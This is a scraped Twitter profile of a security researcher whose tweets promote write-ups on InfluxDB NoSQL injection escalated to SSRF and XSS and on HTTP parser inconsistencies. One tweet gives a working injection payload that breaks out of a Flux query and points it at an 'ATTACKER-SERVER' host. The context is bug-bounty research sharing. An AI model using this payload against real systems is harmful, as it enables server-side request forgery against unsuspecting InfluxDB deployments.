rafa (@rafabyte_) 's Twitter Profile
rafa

@rafabyte_

Security Researcher rafa.hashnode.dev

ID: 1692137397906001920

linkhttps://rafa.hashnode.dev/ calendar_today17-08-2023 11:32:55

19 Tweet

202 Followers

96 Following

rafa (@rafabyte_) 's Twitter Profile Photo

Just published a post detailing how I developed an exploit for a NoSQL Injection for InfluxDB and how I escalated this issue into an SSRF and XSS: rafa.hashnode.dev/influxdb-nosql…

Bug Bounty Reports Explained (@gregxsunday) 's Twitter Profile Photo

Exploiting HTTP Parsers Inconsistencies by Rafael da Costa Santos rafa.hashnode.dev/exploiting-htt… #BBRENewsletter59 Subscribe to get the next issue: bbre.dev/nl

Exploiting HTTP Parsers Inconsistencies by Rafael da Costa Santos
rafa.hashnode.dev/exploiting-htt…
#BBRENewsletter59
Subscribe to get the next issue: bbre.dev/nl
Benasin (@benasin3) 's Twitter Profile Photo

#100DaysOfHacking Day 16: - Still bug hunting :D (Currently trying to bypass WAF for XSS) - Found a cool research about exploiting HTTP Parsers Inconsistencies rafa.hashnode.dev/exploiting-htt…

PentesterLab (@pentesterlab) 's Twitter Profile Photo

Articles worth reading discovered last week: 🗞 rafa.hashnode.dev/exploiting-htt… 🗞 labs.watchtowr.com/cve-2023-36844… 🗞 blog.isosceles.com/exploit-equiva… 🗞 pathonproject.com/zb/?a291b70fb1… #PentesterLabWeekly

rafa (@rafabyte_) 's Twitter Profile Photo

Did you know that this is a valid payload for SSRF? ") |> yield(name: "1337") from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0) // example.com/?id=%22)%20%7c… Check out my post where I explain that: rafa.hashnode.dev/influxdb-nosql… #bugbountytips

rafa (@rafabyte_) 's Twitter Profile Photo

My research (Exploiting HTTP Parsers Inconsistencies) now has a dedicated page on HackTricks! book.hacktricks.xyz/pentesting-web…